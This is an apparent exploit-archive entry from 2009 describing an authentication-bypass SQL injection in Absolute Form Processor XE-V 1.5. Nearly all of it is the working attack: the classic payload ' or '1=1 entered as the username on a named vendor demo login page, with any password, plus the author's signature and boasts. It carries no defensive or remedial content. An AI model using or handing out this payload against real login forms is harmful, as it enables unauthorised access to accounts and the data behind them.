id: 5014
date: 04/08/2009
title: Absolute Form Processor XE-V 1.5 (Auth Bypass) SQL Injection Vuln
author: ThE g0bL!N
cves: 

=================================================================
Absolute Form Processor XE-V 1.5 (Auth Bypass) SQL Injection Vuln 
=================================================================


-----------------------------------------------------
Absolute Form Processor XE-V 1.5 (auth Bypass) Remote Sql Injecion
-----------------------------------------------------
Founder: ThE g0bL!N(Dz)
Vive Algerie
# demo : http://www.xigla.com/absolutefp/demo/

Note : Les Algerien Rasa wa Li Yekhreb Fina Basa :)
-----------------------------------------------------------
-----------------------------------------------------------
exploit
-------
http://www.xigla.com/absolutefp/demo/login.asp
username:  ' or '1=1
Password:  ThE g0bL!N Or any Thing

demo:
-----
http://www.xigla.com/absolutefp/demo/login.asp
------------------------------------------------------




#  0day.today [2023-03-26]  #